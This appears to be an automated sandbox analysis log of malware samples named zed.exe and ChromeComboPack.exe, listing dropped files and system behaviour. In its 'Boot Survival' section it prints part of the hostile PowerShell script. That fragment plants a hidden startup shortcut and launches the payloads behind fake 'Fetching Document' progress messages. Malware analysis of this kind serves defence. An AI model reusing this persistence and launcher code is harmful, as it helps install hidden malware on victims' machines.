Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17802\pywin32_system32\pywintypes312.dllJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\Cipher\_raw_cbc.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Protocol\_scrypt.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\Hash\_SHA224.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17802\_bz2.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22602\charset_normalizer\md.cp312-win_amd64.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI13362\_overlapped.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17802\libffi-8.dllJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17802\VCRUNTIME140.dllJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17802\_decimal.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Cipher\_raw_cbc.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17802\charset_normalizer\md.cp312-win_amd64.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Hash\_MD5.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI13362\cryptography\hazmat\bindings\_rust.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\Hash\_MD2.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17802\_socket.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\Hash\_SHA384.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22602\select.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI13362\pyexpat.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17802\charset_normalizer\md__mypyc.cp312-win_amd64.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Hash\_ghash_portable.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\Hash\_RIPEMD160.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22602\unicodedata.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\Hash\_BLAKE2b.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Hash\_ghash_clmul.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17802\libcrypto-3.dllJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\Cipher\_raw_cfb.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Hash\_RIPEMD160.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Hash\_SHA512.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22602\_lzma.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Hash\_poly1305.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI13362\libssl-3.dllJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Cipher\_raw_arc2.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Hash\_MD5.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17802\select.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Util\_strxor.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Util\_strxor.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Cipher\_raw_ecb.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Util\_cpuid_c.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17802\setuptools\_vendor\wheel-0.43.0.dist-info\LICENSE.txt
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17802\wheel-0.43.0.dist-info\LICENSE.txt

Boot Survival

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: .lnk" $startupFolder = [System.IO.Path]::Combine($env:APPDATA, "Microsoft\Windows\Start Menu\Programs\Startup")$shortcutPath = [System.IO.Path]::Combine($startupFolder, $shortcutName)$shell = New-Object -ComObject WScript.Shell$shortcut = $shell.CreateShortcut($shortcutPath)$shortcut.TargetPath = "powershell.exe"$shortcut.Arguments = "-WindowStyle Hidden -File `"$ps1Path`""$shortcut.WindowStyle = 7$shortcut.Description = "Runs taskboy.ps1 on system startup"$shortcut.Save()# Execute processes if presentif (Test-Path $payloadFolderPath) { Set-Location -Path $payloadFolderPath Write-Host "Fetching Document -- 40% --" $zedExePath = Join-Path $payloadFolderPath "zed.exe" if (Test-Path $zedExePath) { $processRunning = Get-Process -Name "zed" -ErrorAction SilentlyContinue if ($null -eq $processRunning) { Start-Process -FilePath $zedExePath -WorkingDirectory $payloadFolderPath Write-Host "Fetching Document -- 45% --" Start-Sleep -Seconds 120 } else { Write-Host "Error at -- 45% --" } $chromeComboPackPath = Join-Path $payloadFolderPath "ChromeComboPack.exe" if (Test-Path $chromeComboPackPath) { Start-Process -FilePath $chromeComboPackPath -WorkingDirectory $payloadFolderPath Write-Host "Fetching Document -- 65% --" } else { Write-Host "Error at -- 65% --" } } else { Write-Host "Error at -- 75.5% --" }} else { Write-Host "Error at -- 85.5% --"}Read-Host "Fetching Document -- 100% --"@{# Script module or binary module file associated with this manifest.ModuleToProcess = 'Pester.psm1'# Version number of this module.ModuleVersion = '3.4.0'# ID used to uniquely identify this moduleGUID = 'a699dea5-2c73-4616-a270-1f7abb777e71'# Author of this moduleAuthor = 'Pester Team'# Company or vendor of this moduleCompanyName = 'Pester'# Copyright statement for this moduleCopyright = 'Copyright (c) 2016 by Pester Team, licensed under Apache 2.0 License.'# Description of the functionality provided by this moduleDescription = 'Pester provides a framework for running BDD style Tests to execute and validate PowerShell commands inside of PowerShell and offers a powerful set of Mocking Functions that allow tests to mimic and mock the functionality of any command inside of a piece of powershell code being tested. Pester tests can execute any command or script that is accesible to a pester test file. This can include functions, Cmdlets, Modules and scripts. Pester can be run in ad hoc style in a console or it can be integrated into the Build scripts of a Continuous Integration system.'# Minimum version of the Windows PowerShell user required by this modulePowerShellVersion = '2.0'# Functions to export from this moduleFunctionsToExport = @( 'Describe', 'Context', 'It', 'Should', 'Mock', 'Assert-MockCalled', 'Assert-VerifiableMocks', 'New-Fixture', 'Get-TestDriveItem', 'Invoke-Pester', 'S
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RunTaskboyOnStartup.lnkJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RunTaskboyOnStartup.lnkJump to behavior

Hooking and other Techniques for Hiding and Protection

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeCode function: 6_2_00007FF7E53076C0 GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,6_2_00007FF7E53076C0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
